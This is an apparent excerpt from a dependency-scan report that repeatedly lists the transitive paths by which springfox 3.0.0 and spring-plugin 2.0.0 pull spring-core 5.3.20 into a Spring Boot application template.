  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
